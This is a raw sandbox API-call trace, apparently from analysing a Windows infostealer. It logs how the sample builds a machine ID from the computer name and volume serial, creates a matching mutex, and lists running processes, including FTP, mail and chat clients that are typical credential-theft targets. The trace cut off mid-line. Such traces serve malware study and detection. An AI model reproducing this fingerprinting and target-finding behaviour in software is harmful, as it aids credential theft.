Sleep (dwMilliseconds=0xa) [0274.919] Sleep (dwMilliseconds=0xa) [0274.985] GetSystemDirectoryA (in: lpBuffer=0x1066fde0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0274.985] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0274.985] RtlGetVersion (in: lpVersionInformation=0x1e50457 | out: lpVersionInformation=0x1e50457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0274.986] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x1066fdc8 | out: TokenHandle=0x1066fdc8*=0x1018) returned 1 [0274.986] GetTokenInformation (in: TokenHandle=0x1018, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1066fdc0 | out: TokenInformation=0x0, ReturnLength=0x1066fdc0) returned 0 [0274.986] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x25) returned 0x85a0830 [0274.986] GetTokenInformation (in: TokenHandle=0x1018, TokenInformationClass=0x19, TokenInformation=0x85a0830, TokenInformationLength=0x1c, ReturnLength=0x1066fdc0 | out: TokenInformation=0x85a0830, ReturnLength=0x1066fdc0) returned 1 [0274.986] GetSidSubAuthorityCount (pSid=0x85a0840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x85a0841 [0274.986] GetSidSubAuthority (pSid=0x85a0840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x85a0848 [0274.986] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x25 [0274.987] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0274.987] CloseHandle (hObject=0x1018) returned 1 [0274.987] GetComputerNameA (in: lpBuffer=0x1066fe90, nSize=0x1066fed0 | out: lpBuffer="XC64ZB", nSize=0x1066fed0) returned 1 [0274.987] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1066fec0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1066fec0*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0274.988] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x29) returned 0x85a0830 [0274.988] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0x14) returned 0x85a0870 [0274.988] wsprintfA (in: param_1=0x85a0830, param_2="%s%08X%08X" | out: param_1="XC64ZB99FC78690C287F38") returned 22 [0274.988] CryptAcquireContextA (in: phProv=0x1066fe18, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x1066fe18*=0xa187950) returned 1 [0274.991] CryptCreateHash (in: hProv=0xa187950, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x1066fe10 | out: phHash=0x1066fe10) returned 1 [0274.991] lstrlenA (lpString="XC64ZB99FC78690C287F38") returned 22 [0274.991] CryptHashData (hHash=0xa0243e0, pbData=0x85a0830, dwDataLen=0x16, dwFlags=0x0) returned 1 [0274.991] CryptGetHashParam (in: hHash=0xa0243e0, dwParam=0x2, pbData=0x1066fe20, pdwDataLen=0x1066fe50, dwFlags=0x0 | out: pbData=0x1066fe20, pdwDataLen=0x1066fe50) returned 1 [0274.991] wsprintfA (in: param_1=0x1e5020c, param_2="%02X" | out: param_1="FE") returned 2 [0274.991] wsprintfA (in: param_1=0x1e5020e, param_2="%02X" | out: param_1="7F") returned 2 [0274.991] wsprintfA (in: param_1=0x1e50210, param_2="%02X" | out: param_1="15") returned 2 [0274.991] wsprintfA (in: param_1=0x1e50212, param_2="%02X" | out: param_1="06") returned 2 [0274.991] wsprintfA (in: param_1=0x1e50214, param_2="%02X" | out: param_1="0B") returned 2 [0274.991] wsprintfA (in: param_1=0x1e50216, param_2="%02X" | out: param_1="87") returned 2 [0274.991] wsprintfA (in: param_1=0x1e50218, param_2="%02X" | out: param_1="5F") returned 2 [0274.991] wsprintfA (in: param_1=0x1e5021a, param_2="%02X" | out: param_1="B9") returned 2 [0274.991] wsprintfA (in: param_1=0x1e5021c, param_2="%02X" | out: param_1="FB") returned 2 [0274.991] wsprintfA (in: param_1=0x1e5021e, param_2="%02X" | out: param_1="2A") returned 2 [0274.991] wsprintfA (in: param_1=0x1e50220, param_2="%02X" | out: param_1="49") returned 2 [0274.991] wsprintfA (in: param_1=0x1e50222, param_2="%02X" | out: param_1="F0") returned 2 [0274.992] wsprintfA (in: param_1=0x1e50224, param_2="%02X" | out: param_1="8D") returned 2 [0274.992] wsprintfA (in: param_1=0x1e50226, param_2="%02X" | out: param_1="5D") returned 2 [0274.992] wsprintfA (in: param_1=0x1e50228, param_2="%02X" | out: param_1="03") returned 2 [0274.992] wsprintfA (in: param_1=0x1e5022a, param_2="%02X" | out: param_1="12") returned 2 [0274.992] CryptDestroyHash (hHash=0xa0243e0) returned 1 [0274.992] CryptReleaseContext (hProv=0xa187950, dwFlags=0x0) returned 1 [0274.992] wsprintfA (in: param_1=0x1e5022c, param_2="%08X" | out: param_1="0C287F38") returned 8 [0274.992] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0870) returned 0x14 [0274.992] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0870) returned 1 [0274.992] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0x29 [0274.992] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0274.992] RtlAllocateHeap (HeapHandle=0x85a0000, Flags=0x8, Size=0xe) returned 0x85a0830 [0274.992] wsprintfA (in: param_1=0x1e50dbe, param_2="%sFF" | out: param_1="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 42 [0274.992] RtlSizeHeap (HeapHandle=0x85a0000, Flags=0x0, MemoryPointer=0x85a0830) returned 0xe [0274.993] RtlFreeHeap (HeapHandle=0x85a0000, Flags=0x0, BaseAddress=0x85a0830) returned 1 [0274.993] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned 0x1018 [0274.993] RtlGetLastWin32Error () returned 0xb7 [0274.993] CloseHandle (hObject=0x1018) returned 1 [0274.993] RtlExitUserThread (Status=0x0) Thread: id = 180 os_tid = 0xcb4 [0195.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x228c [0195.745] Process32First (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.750] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.752] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.754] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.756] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.757] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.760] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.764] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.766] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.768] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.769] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.771] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.773] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.774] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.800] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.802] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.804] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.806] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.811] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.813] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.814] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0195.816] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0195.818] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.819] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.821] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0195.826] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0195.827] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0195.829] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0195.831] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.832] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0195.834] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0195.836] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.837] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0195.890] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0195.892] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0195.894] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0195.896] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0195.899] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0195.901] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0195.907] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0195.910] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0195.912] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0195.914] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0195.916] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0195.921] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0195.923] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0195.925] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0195.928] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0195.930] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0195.932] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0195.986] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0195.989] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0195.991] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0195.993] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0195.999] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0196.002] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0196.004] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0196.006] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0196.009] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0196.016] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0196.019] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0196.022] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0196.024] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0196.036] Process32Next (in: hSnapshot=0x228c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 